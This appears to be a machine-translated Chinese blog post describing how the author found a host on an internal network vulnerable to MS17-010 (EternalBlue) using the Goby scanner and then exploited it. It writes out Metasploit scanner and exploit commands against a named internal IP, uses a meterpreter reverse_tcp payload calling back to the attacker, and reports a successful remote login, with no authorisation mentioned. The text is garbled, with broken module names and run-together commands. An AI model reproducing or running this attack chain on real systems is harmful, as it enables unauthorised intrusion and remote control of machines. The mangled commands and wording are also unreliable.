Ms17-010(ms17-0101)

Ms17-010(ms17-0101)

0x00 前言

最近疫情严重,上班时间都耽误了。在家学习的时候发现了goby,用来监控网络IT资产。

昨天,我可以试用它并扫描内部网资产。

地址0708 https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows.

0x01 Goby简介

分析目标网络的IT资产的规则来构建知识库,可以在安全事件发生的最短时间内管理安全突发事件。与传统的端口扫描和漏洞扫描不同,Goby只处理小范围受影响区域的漏洞突发事件,因此这种方式速度最快,对目标网络的影响最小。

在官网下载https://gobies.org/安装试用版

设置扫描任务

期间发现某主机可能有永恒蓝,就打了。

0x02 msf–ms17-010扫描确认

攻击机卡利linux

目标10

工具metasploit

Nmap扫描目标端口,并确认端口445是开放的。

MSF console # enter MSF MSF >:Search ms17-010 #查看相关模块MSF >:use auxiliary/scanner/SMB/SMB _ ms17 _ 010 MSF auxiliary(scanner/SMB/SMB _ ms17 _ 010)>set rhosts 10.118.72.111msf辅助(scanner/smb/smb_ms17_010)>利用

确认易受攻击!

说明主机10.118.72.111存在MS17-010漏洞。

漏洞攻击

使用下面的攻击模块

msf & gt使用exploit/windows/SMB/ms17 _ 010 _ eternal blue MSF exploit(windows/SMB/ms17 _ 010 _ eternal blue)>set rhost 10.118.72.111rhost = >10.118.72.111msf漏洞利用(windows/SMB/ms17 _ 010 _ eternal blue)>set lhost xxxlhost = & gtxxxmsf漏洞利用(windows/SMB/ms17 _ 010 _ eternal blue)>设置有效负载windows/x64/meter preter/reverse _ tcppayload = & gt;windows/x64/meter preter/reverse _ tcpmsf exploit(windows/SMB/ms17 _ 010 _ eternal blue)>

但是…。。没用。

我在后面找到了https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html的参考文献。

x86平台下失败的解决方法

Msf自带的utilization模块只针对x64版本的操作系统,对于x86版本的操作系统无效。可以使用https://git . lau cyun . com/security/eternal blue-double pulsar-metasploit . git解决。

最终的配置是

吴氏还修改了一套当时注射lsass.exe的流程。

我们胜利了。

端口389是打开的

远程登录成功!

其他资料

Ms17010这个问题其实挺难的。看到好的信息,先收集起来,以便后期攻防使用。

https://mp.weixin.qq.com/s/EoHB02qOscZsj3cNS40Rsw

由于缺乏内网渗透的经验,我们还在摸索中。可以对下一步的渗透提出建议!

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。

作者:美站资讯,如若转载,请注明出处:https://www.meizw.com/n/304692.html

发表回复

登录后才能评论